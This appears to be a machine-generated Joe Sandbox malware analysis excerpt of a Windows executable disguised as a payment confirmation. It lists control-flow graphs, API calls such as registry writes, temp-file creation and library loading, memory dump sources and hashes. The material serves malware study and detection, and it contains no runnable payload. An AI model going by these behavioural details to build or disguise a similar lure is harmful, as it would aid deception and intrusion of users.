                                                            • Snapshot File: hcaresult_0_2_6e310000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                                            • String ID:
                                                            • API String ID: 3962662361-3916222277
                                                            • Opcode ID: 3de06827cb93674feaf094ec281f14f5afb11c30bd8f1cfaf8118e927b0f2163
                                                            • Instruction ID: a84d86314f184f656fde97c6d77db51d01d5e39f30a19534e74a60fb17059266
                                                            • Opcode Fuzzy Hash: 3de06827cb93674feaf094ec281f14f5afb11c30bd8f1cfaf8118e927b0f2163
                                                            • Instruction Fuzzy Hash: F641D87140C2069BDF489FF4D984BD537ACAF16358F1488ADED959B08ADBB5C18CC7A0

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 616 401c48-401c68 call 402d89 * 2 621 401c74-401c78 616->621 622 401c6a-401c71 call 402dab 616->622 624 401c84-401c8a 621->624 625 401c7a-401c81 call 402dab 621->625 622->621 628 401cd8-401d02 call 402dab * 2 FindWindowExW 624->628 629 401c8c-401ca8 call 402d89 * 2 624->629 625->624 641 401d08 628->641 639 401cc8-401cd6 SendMessageW 629->639 640 401caa-401cc6 SendMessageTimeoutW 629->640 639->641 642 401d0b-401d0e 640->642 641->642 643 401d14 642->643 644 402c2f-402c3e 642->644 643->644
                                                            APIs
                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Timeout
                                                            • String ID: !
                                                            • API String ID: 1777923405-2657877971
                                                            • Opcode ID: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
                                                            • Instruction ID: 6f1bda49a4997cd21eb3df4025a59d3ac8dc5d95b16fa6faa4f7de2005ea5abe
                                                            • Opcode Fuzzy Hash: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
                                                            • Instruction Fuzzy Hash: 57219C7191421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 647 40248f-4024b6 call 402dab * 2 call 402e3b 653 4024bb-4024c0 647->653 654 4024c6-4024d0 653->654 655 402c2f-402c3e 653->655 656 4024d2-4024df call 402dab lstrlenW 654->656 657 4024e3-4024e6 654->657 656->657 661 4024e8-4024f9 call 402d89 657->661 662 4024fa-4024fd 657->662 661->662 664 40250e-402522 RegSetValueExW 662->664 665 4024ff-402509 call 403376 662->665 669 402524 664->669 670 402527-402608 RegCloseKey 664->670 665->664 669->670 670->655
                                                            APIs
                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa1392.tmp,00000023,00000011,00000002), ref: 004024DA
                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,00000000,00000011,00000002), ref: 0040251A
                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,00000000,00000011,00000002), ref: 00402602
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: CloseValuelstrlen
                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsa1392.tmp
                                                            • API String ID: 2655323295-1847755183
                                                            • Opcode ID: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
                                                            • Instruction ID: be9c33e72f15a848a09509bfe82e7b73cbf05d8b6c9bfbfc98f7540490fedb8c
                                                            • Opcode Fuzzy Hash: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
                                                            • Instruction Fuzzy Hash: 26119D31900118AEEB10EFA5DE59EAEBAB4AB44318F10483FF404B61C0C7B88E019A58

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 672 4061a1-4061ad 673 4061ae-4061e2 GetTickCount GetTempFileNameW 672->673 674 4061f1-4061f3 673->674 675 4061e4-4061e6 673->675 676 4061eb-4061ee 674->676 675->673 677 4061e8 675->677 677->676
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 004061BF
                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403643,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F), ref: 004061DA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: CountFileNameTempTick
                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                            • API String ID: 1716503409-44229769
                                                            • Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                            • Instruction ID: d5af49f5aac0e4cb02feadf6e990f33ccb34da23aa7fbf3522b8764b63faf6c0
                                                            • Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                            • Instruction Fuzzy Hash: 90F09076701204BFEB008F59DD05E9EB7BCEBA5710F11803EF901F7240E6B49A648764

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 761 4015c6-4015da call 402dab call 405ffc 766 401636-401639 761->766 767 4015dc-4015ef call 405f7e 761->767 769 401668-4022fb call 401423 766->769 770 40163b-40165a call 401423 call 406682 SetCurrentDirectoryW 766->770 774 4015f1-4015f4 767->774 775 401609-40160c call 405c30 767->775 785 402c2f-402c3e 769->785 770->785 787 401660-401663 770->787 774->775 778 4015f6-4015fd call 405c4d 774->778 784 401611-401613 775->784 778->775 792 4015ff-401602 call 405bd6 778->792 788 401615-40161a 784->788 789 40162c-401634 784->789 787->785 793 401629 788->793 794 40161c-401627 GetFileAttributesW 788->794 789->766 789->767 796 401607 792->796 793->789 794->789 794->793 796->784
                                                            APIs
                                                              • Part of subcall function 00405FFC: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"), ref: 0040600A
                                                              • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
                                                              • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027
                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                              • Part of subcall function 00405BD6: CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C18
                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet,?,00000000,000000F0), ref: 00401652
                                                            Strings
                                                            • C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet, xrefs: 00401645
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                            • String ID: C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet
                                                            • API String ID: 1892508949-3948318427
                                                            • Opcode ID: 863e97e9a1a98ee7b9bda4f27f85bc968de3615fba3b8b02605abd041f87ab9d
                                                            • Instruction ID: 68e4a3e0657f1f56d5d8600c1d99eb964219fead50354605c61944b677c9a350
                                                            • Opcode Fuzzy Hash: 863e97e9a1a98ee7b9bda4f27f85bc968de3615fba3b8b02605abd041f87ab9d
                                                            • Instruction Fuzzy Hash: DD11BE31404214ABCF20AFB5CD0099F36B0EF04368B25493FE946B22F1DA3E4A819B5E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
                                                            • Instruction ID: 5108979c3f50e514b4d7e1fb6dd8ed840f295859cf3be547aab63c341a9fbe83
                                                            • Opcode Fuzzy Hash: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
                                                            • Instruction Fuzzy Hash: 8BA14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856AD856BB281C7786A86DF45
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
                                                            • Instruction ID: e1ca38fbe1868b0530a5cca2aefb0608b46060051e5a62990b8a86f9073b7715
                                                            • Opcode Fuzzy Hash: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
                                                            • Instruction Fuzzy Hash: 61912370D04228CBDF28CF98C8547ADBBB1FF44305F14856AD856BB291C778AA86DF45
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
                                                            • Instruction ID: c8babd12d4b9043659ede3bd230c10fd4be49189821a01af26e4b19fb55261c2
                                                            • Opcode Fuzzy Hash: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
                                                            • Instruction Fuzzy Hash: B1813571D04228DBDF24CFA8C8847ADBBB1FF44305F24856AD456BB281C778AA86DF45
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
                                                            • Instruction ID: 70604387997e4686e0750d9790b47f8334db0f7ece30ebb4bbc07469160fd387
                                                            • Opcode Fuzzy Hash: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
                                                            • Instruction Fuzzy Hash: A4816571D04228DBDF24CFA8C8447ADBBB0FF44315F20856AD856BB281C7786A86DF45
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
                                                            • Instruction ID: 95d77a19c0962547fc3f67c13c4944abdc30b9b20558c44938f244593de0d4a6
                                                            • Opcode Fuzzy Hash: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
                                                            • Instruction Fuzzy Hash: 49713471D04228CBDF24CFA8C8847ADBBB1FF48305F15806AD856BB281C7386986DF45
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
                                                            • Instruction ID: 33b9de73c5357426475d1ecb6718d507a7f793f52192090568aa5f1be2fe3f26
                                                            • Opcode Fuzzy Hash: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
                                                            • Instruction Fuzzy Hash: D8714671E04228CBDF28CF98C8847ADBBB1FF44305F15856AD856BB281C7786986DF45
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
                                                            • Instruction ID: eebb37c65e2131d6119e05978ba22ffeb7e1a1a57c5d17d20a151e235b5fbeda
                                                            • Opcode Fuzzy Hash: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
                                                            • Instruction Fuzzy Hash: DD714771E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7786A86DF45
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00403492
                                                              • Part of subcall function 004035FD: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B
                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 004034C5
                                                            • SetFilePointer.KERNELBASE(0010A7C7,00000000,00000000,00414EF0,00004000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000), ref: 004035C0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: FilePointer$CountTick
                                                            • String ID:
                                                            • API String ID: 1092082344-0
                                                            • Opcode ID: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                            • Instruction ID: 0007fe48f9bd4e0bdf6fbdcb7c574e60e63cda3bf49c02497359f5fe5cde5340
                                                            • Opcode Fuzzy Hash: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                            • Instruction Fuzzy Hash: C7319172600215EBC7309F29EE848163BADF744356755023BE501B26F1CBB5AE42DB9D
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402108
                                                              • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                              • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                              • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                              • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00402119
                                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 00402196
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
